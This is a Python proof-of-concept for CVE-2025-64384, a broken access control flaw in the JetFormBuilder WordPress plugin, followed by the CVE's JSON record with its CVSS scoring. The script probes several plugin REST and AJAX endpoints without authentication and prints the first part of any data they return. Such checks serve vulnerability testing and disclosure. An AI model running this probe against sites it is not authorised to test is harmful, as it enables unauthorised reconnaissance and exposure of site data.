CVE-2025-64384

import requests import sys # CVE-2025-64384 PoC - JetFormBuilder Broken Access Control # Target: WordPress site with JetFormBuilder plugin <= 3.5.3 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64384 Missing Authorization in JetFormBuilder plugin """ # Common JetFormBuilder endpoints that may lack authorization endpoints = [ '/wp-json/jet-form-builder/v1/forms', '/wp-json/jet-form-builder/v1/field-types', '/wp-admin/admin-ajax.php?action=jet_fb_fetch_form', '/wp-admin/admin-ajax.php?action=jet_fb_save_form', '/wp-json/jet-form-builder/v1/notifications' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10) # Check if we get unauthorized response or actual data if response.status_code == 200: # Check if response contains sensitive data without auth if 'form' in response.text.lower() or 'field' in response.text.lower(): print(f'[+] Potentially vulnerable endpoint: {url}') print(f' Status: {response.status_code}') print(f' Response preview: {response.text[:200]}...') vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f'[-] Protected endpoint: {url}') except requests.exceptions.RequestException as e: print(f'[!] Error testing {url}: {e}') return vulnerable if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-64384-poc.py <target_url>') print('Example: python cve-2025-64384-poc.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning {target} for CVE-2025-64384...') print(f'[*] JetFormBuilder <= 3.5.3 Broken Access Control\n') if check_vulnerability(target): print('\n[!] Target may be vulnerable to CVE-2025-64384') print('[*] Recommended action: Upgrade JetFormBuilder to latest version') else: print('\n[*] No obvious vulnerabilities detected') print('[*] Manual testing may be required')

{"cve": {"id": "CVE-2025-64384", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:54.663", "lastModified": "2026-04-27T16:16:42.370", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in jetmonsters JetFormBuilder jetformbuilder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetFormBuilder: from n/a through <= 3.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jetformbuilder/vulnerability/wordpress-jetformbuilder-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}